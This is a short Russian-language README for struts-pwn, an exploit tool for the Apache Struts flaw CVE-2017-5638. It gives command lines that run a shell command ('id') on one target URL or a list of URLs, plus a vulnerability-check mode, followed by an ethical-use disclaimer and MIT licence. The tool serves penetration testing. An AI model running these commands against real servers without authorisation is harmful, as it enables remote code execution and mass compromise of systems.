
Эксплойт для Apache Struts CVE-2017-5638
python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'
python struts-pwn.py --list 'urls.txt' -c 'id'
python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'
python struts-pwn.py --check --list 'urls.txt'
Данный проект предназначен только для образовательных и этических целей тестирования. Использование struts-pwn для атак на цели без предварительного взаимного согласия является незаконным. Ответственность за соблюдение всех применимых местных, государственных и федеральных законов лежит на конечном пользователе. Разработчики не несут никакой ответственности и не отвечают за любое неправомерное использование или ущерб, причиненный данной программой.
Проект лицензирован под лицензией MIT.
Mazin Ahmed